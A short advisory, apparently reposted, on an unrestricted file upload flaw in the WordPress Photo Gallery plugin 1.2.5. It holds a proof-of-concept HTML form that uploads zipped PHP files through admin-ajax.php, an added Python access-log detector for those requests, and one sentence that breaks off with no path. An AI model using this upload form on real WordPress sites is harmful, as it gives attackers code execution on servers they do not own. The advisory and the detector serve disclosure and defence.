
WordPress Photo Gallery Upload Vulnerability

Date: 2016-08-22  Source: unknown  Author: 安云网
1. Description
   
Every registered user (even a Subscriber) can access the upload functionality because the read role is used inside UploadHandler.php.
 
   
2. Proof of Concept
 
Log in as a regular user (created using wp-login.php?action=register).
 
Pack the .php files into a .zip archive, then send it using:
 
<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/" enctype="multipart/form-data">
    <input type="file" name="files">
    <input type="submit" value="Hack!">
</form>
 
Your files will be visible inside:
 
   
3. Solution
   
Update to version 1.2.6
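
A log check for the request shown in the proof of concept, added here as an example and not part of the original advisory or the plugin: it scans web-server access logs for POSTs to admin-ajax.php that name the bwg_UploadHandler action. The log lines, IP addresses and the function name find_upload_handler_posts are constructed for illustration, and the "combined" log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [22/Aug/2016:10:01:02 +0000] "POST /wp-login.php?action=register HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [22/Aug/2016:10:03:40 +0000] "POST /wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/ HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.9 - - [22/Aug/2016:10:04:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"
198.51.100.9 - - [22/Aug/2016:10:05:11 +0000] "GET /wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=%2F HTTP/1.1" 200 20 "-" "Mozilla/5.0"
192.0.2.44 - - [22/Aug/2016:10:06:30 +0000] "POST /blog/wp-admin/admin-ajax.php?dir=x%2F&action=bwg%5FUploadHandler HTTP/1.1" 403 0 "-" "curl/7.47"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
HANDLER_ACTION = "bwg_uploadhandler"  # action name from the advisory, lower-cased


def find_upload_handler_posts(log_text):
    """Return one dict per POST to admin-ajax.php that names the upload handler."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["target"])
        # endswith() also covers WordPress installed in a subdirectory.
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        params = parse_qs(url.query)  # parse_qs also percent-decodes values
        # Compared case-insensitively to be conservative.
        actions = [a.lower() for a in params.get("action", [])]
        if HANDLER_ACTION not in actions:
            continue
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "dir": params.get("dir", [""])[0],
            "status": int(m["status"]),
        })
    return hits


if __name__ == "__main__":
    for hit in find_upload_handler_posts(SAMPLE_LOG):
        print(hit)
```

Access logs do not record POST bodies, and WordPress reads the action parameter from either the query string or the body, so a request carrying it in the body will not match here. On sites still running a version below 1.2.6, any hit from an account that should not be uploading is worth following up with a review of the plugin's upload directory.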


Prerequisite: register a user account first.

Reference:

http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html

